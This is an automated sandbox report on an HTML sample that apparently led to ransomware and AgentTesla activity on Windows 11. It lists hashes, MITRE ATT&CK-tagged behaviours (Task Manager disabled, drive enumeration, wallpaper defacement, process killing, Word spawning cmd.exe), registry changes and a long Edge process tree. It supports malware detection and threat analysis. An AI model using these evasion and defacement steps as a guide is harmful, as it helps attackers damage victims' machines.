6514b345465786d232a61f8aca8e3b60e2bf8a3e45f237086e55caac0c19cb4d

max time kernel
305s
max time network
345s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
13-01-2025 16:48

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

JaffaCakes118_1d93e8597dd860cf81cd913c4b997818.html
Size

25KB
MD5

1d93e8597dd860cf81cd913c4b997818
SHA1

a7dacf6a32b194720a87130a16f2222c44f036eb
SHA256

6514b345465786d232a61f8aca8e3b60e2bf8a3e45f237086e55caac0c19cb4d
SHA512

c35592acafe20b18914ba7ee31201faa7534136df292d7c14436fb3bcbdd5f07b96b3b63897509068b8263ec4e12f55e192de027996dac8e63e08712fb891e98
SSDEEP

384:PqlIcCtF4JVGTHyk9v1o99t5W9ISFaTGHx6QckT/gbpLOXguLZ:sZtSF5zg9ExLZ

Score

10^/10

discovery evasion ransomware

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	3964	2968	cmd.exe	123

Disables Task Manager via registry modification
evasion

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\V:	000.exe
File opened (read-only)	\??\X:	000.exe
File opened (read-only)	\??\G:	000.exe
File opened (read-only)	\??\M:	000.exe
File opened (read-only)	\??\S:	000.exe
File opened (read-only)	\??\J:	000.exe
File opened (read-only)	\??\K:	000.exe
File opened (read-only)	\??\L:	000.exe
File opened (read-only)	\??\R:	000.exe
File opened (read-only)	\??\Y:	000.exe
File opened (read-only)	\??\A:	000.exe
File opened (read-only)	\??\E:	000.exe
File opened (read-only)	\??\H:	000.exe
File opened (read-only)	\??\Z:	000.exe
File opened (read-only)	\??\N:	000.exe
File opened (read-only)	\??\P:	000.exe
File opened (read-only)	\??\W:	000.exe
File opened (read-only)	\??\Q:	000.exe
File opened (read-only)	\??\T:	000.exe
File opened (read-only)	\??\U:	000.exe
File opened (read-only)	\??\B:	000.exe
File opened (read-only)	\??\I:	000.exe
File opened (read-only)	\??\O:	000.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Control Panel\Desktop\Wallpaper	000.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Avoid.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AgentTesla.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	000.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE

Kills process with taskkill 2 IoCs

evasion

pid	Process
5416	taskkill.exe
3968	taskkill.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon	000.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\txtfile	000.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\icon.ico"	000.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1537126222-899333903-2037027349-1000\{55BA5655-3B60-46A3-8B8A-D6B8CAB46E62}	000.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\The-MALWARE-Repo-master.zip:Zone.Identifier	msedge.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
2968	WINWORD.EXE
2968	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 17 IoCs

pid	Process
1600	msedge.exe
1600	msedge.exe
1376	msedge.exe
1376	msedge.exe
3732	identity_helper.exe
3732	identity_helper.exe
948	msedge.exe
948	msedge.exe
2644	msedge.exe
2644	msedge.exe
2880	msedge.exe
2880	msedge.exe
2880	msedge.exe
2880	msedge.exe
5192	powershell.exe
5192	powershell.exe
5192	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 23 IoCs

pid	Process
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: 33	2296	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2296	AUDIODG.EXE
Token: 33	4640	msedge.exe
Token: SeIncBasePriorityPrivilege	4640	msedge.exe
Token: 33	4640	msedge.exe
Token: SeIncBasePriorityPrivilege	4640	msedge.exe
Token: 33	4640	msedge.exe
Token: SeIncBasePriorityPrivilege	4640	msedge.exe
Token: 33	4640	msedge.exe
Token: SeIncBasePriorityPrivilege	4640	msedge.exe
Token: 33	4640	msedge.exe
Token: SeIncBasePriorityPrivilege	4640	msedge.exe
Token: 33	4640	msedge.exe
Token: SeIncBasePriorityPrivilege	4640	msedge.exe
Token: 33	4640	msedge.exe
Token: SeIncBasePriorityPrivilege	4640	msedge.exe
Token: 33	4640	msedge.exe
Token: SeIncBasePriorityPrivilege	4640	msedge.exe
Token: 33	4640	msedge.exe
Token: SeIncBasePriorityPrivilege	4640	msedge.exe
Token: 33	4640	msedge.exe
Token: SeIncBasePriorityPrivilege	4640	msedge.exe
Token: 33	4640	msedge.exe
Token: SeIncBasePriorityPrivilege	4640	msedge.exe
Token: 33	4640	msedge.exe
Token: SeIncBasePriorityPrivilege	4640	msedge.exe
Token: 33	4640	msedge.exe
Token: SeIncBasePriorityPrivilege	4640	msedge.exe
Token: 33	4640	msedge.exe
Token: SeIncBasePriorityPrivilege	4640	msedge.exe
Token: 33	4640	msedge.exe
Token: SeIncBasePriorityPrivilege	4640	msedge.exe
Token: 33	4640	msedge.exe
Token: SeIncBasePriorityPrivilege	4640	msedge.exe
Token: 33	4640	msedge.exe
Token: SeIncBasePriorityPrivilege	4640	msedge.exe
Token: 33	4640	msedge.exe
Token: SeIncBasePriorityPrivilege	4640	msedge.exe
Token: SeDebugPrivilege	5192	powershell.exe
Token: SeShutdownPrivilege	5884	000.exe
Token: SeCreatePagefilePrivilege	5884	000.exe
Token: SeShutdownPrivilege	5884	000.exe
Token: SeCreatePagefilePrivilege	5884	000.exe
Token: SeDebugPrivilege	5416	taskkill.exe
Token: SeShutdownPrivilege	5884	000.exe
Token: SeCreatePagefilePrivilege	5884	000.exe
Token: SeDebugPrivilege	3968	taskkill.exe
Token: SeShutdownPrivilege	5884	000.exe
Token: SeCreatePagefilePrivilege	5884	000.exe
Token: SeIncreaseQuotaPrivilege	1704	WMIC.exe
Token: SeSecurityPrivilege	1704	WMIC.exe
Token: SeTakeOwnershipPrivilege	1704	WMIC.exe
Token: SeLoadDriverPrivilege	1704	WMIC.exe
Token: SeSystemProfilePrivilege	1704	WMIC.exe
Token: SeSystemtimePrivilege	1704	WMIC.exe
Token: SeProfSingleProcessPrivilege	1704	WMIC.exe
Token: SeIncBasePriorityPrivilege	1704	WMIC.exe
Token: SeCreatePagefilePrivilege	1704	WMIC.exe
Token: SeBackupPrivilege	1704	WMIC.exe
Token: SeRestorePrivilege	1704	WMIC.exe
Token: SeShutdownPrivilege	1704	WMIC.exe
Token: SeDebugPrivilege	1704	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1704	WMIC.exe
Token: SeRemoteShutdownPrivilege	1704	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe

Suspicious use of SendNotifyMessage 16 IoCs

pid	Process
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe
1376	msedge.exe

Suspicious use of SetWindowsHookEx 10 IoCs

pid	Process
3552	AgentTesla.exe
2968	WINWORD.EXE
2968	WINWORD.EXE
2968	WINWORD.EXE
2968	WINWORD.EXE
2968	WINWORD.EXE
2968	WINWORD.EXE
2968	WINWORD.EXE
5884	000.exe
5884	000.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1376 wrote to memory of 2084	1376	msedge.exe	78
PID 1376 wrote to memory of 2084	1376	msedge.exe	78
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 2820	1376	msedge.exe	79
PID 1376 wrote to memory of 1600	1376	msedge.exe	80
PID 1376 wrote to memory of 1600	1376	msedge.exe	80
PID 1376 wrote to memory of 4240	1376	msedge.exe	81
PID 1376 wrote to memory of 4240	1376	msedge.exe	81
PID 1376 wrote to memory of 4240	1376	msedge.exe	81
PID 1376 wrote to memory of 4240	1376	msedge.exe	81
PID 1376 wrote to memory of 4240	1376	msedge.exe	81
PID 1376 wrote to memory of 4240	1376	msedge.exe	81
PID 1376 wrote to memory of 4240	1376	msedge.exe	81
PID 1376 wrote to memory of 4240	1376	msedge.exe	81
PID 1376 wrote to memory of 4240	1376	msedge.exe	81
PID 1376 wrote to memory of 4240	1376	msedge.exe	81
PID 1376 wrote to memory of 4240	1376	msedge.exe	81
PID 1376 wrote to memory of 4240	1376	msedge.exe	81
PID 1376 wrote to memory of 4240	1376	msedge.exe	81
PID 1376 wrote to memory of 4240	1376	msedge.exe	81
PID 1376 wrote to memory of 4240	1376	msedge.exe	81
PID 1376 wrote to memory of 4240	1376	msedge.exe	81
PID 1376 wrote to memory of 4240	1376	msedge.exe	81
PID 1376 wrote to memory of 4240	1376	msedge.exe	81
PID 1376 wrote to memory of 4240	1376	msedge.exe	81
PID 1376 wrote to memory of 4240	1376	msedge.exe	81

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_1d93e8597dd860cf81cd913c4b997818.html
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1376
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa0a413cb8,0x7ffa0a413cc8,0x7ffa0a413cd8
  2⤵
  PID:2084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,15137610967826431189,4018935867638331075,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1916 /prefetch:2
  2⤵
  PID:2820
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1928,15137610967826431189,4018935867638331075,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1928,15137610967826431189,4018935867638331075,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2752 /prefetch:8
  2⤵
  PID:4240
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,15137610967826431189,4018935867638331075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3152 /prefetch:1
  2⤵
  PID:3528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,15137610967826431189,4018935867638331075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3172 /prefetch:1
  2⤵
  PID:4456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,15137610967826431189,4018935867638331075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4540 /prefetch:1
  2⤵
  PID:4420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,15137610967826431189,4018935867638331075,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6140 /prefetch:1
  2⤵
  PID:4692
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1928,15137610967826431189,4018935867638331075,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5760 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,15137610967826431189,4018935867638331075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:1
  2⤵
  PID:2032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,15137610967826431189,4018935867638331075,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:1
  2⤵
  PID:1508
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1928,15137610967826431189,4018935867638331075,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5344 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,15137610967826431189,4018935867638331075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1156 /prefetch:1
  2⤵
  PID:2016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,15137610967826431189,4018935867638331075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1788 /prefetch:1
  2⤵
  PID:4796
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,15137610967826431189,4018935867638331075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:1
  2⤵
  PID:2464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,15137610967826431189,4018935867638331075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1168 /prefetch:1
  2⤵
  PID:3380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,15137610967826431189,4018935867638331075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1
  2⤵
  PID:1708
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,15137610967826431189,4018935867638331075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6076 /prefetch:1
  2⤵
  PID:2792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,15137610967826431189,4018935867638331075,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2916 /prefetch:1
  2⤵
  PID:3768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,15137610967826431189,4018935867638331075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:1
  2⤵
  PID:1464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,15137610967826431189,4018935867638331075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:1
  2⤵
  PID:4664
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,15137610967826431189,4018935867638331075,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6264 /prefetch:1
  2⤵
  PID:4376
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,15137610967826431189,4018935867638331075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6932 /prefetch:1
  2⤵
  PID:2964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,15137610967826431189,4018935867638331075,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7048 /prefetch:1
  2⤵
  PID:4676
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,15137610967826431189,4018935867638331075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7060 /prefetch:1
  2⤵
  PID:3884
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,15137610967826431189,4018935867638331075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7080 /prefetch:1
  2⤵
  PID:1700
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,15137610967826431189,4018935867638331075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7124 /prefetch:1
  2⤵
  PID:1200
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,15137610967826431189,4018935867638331075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:1
  2⤵
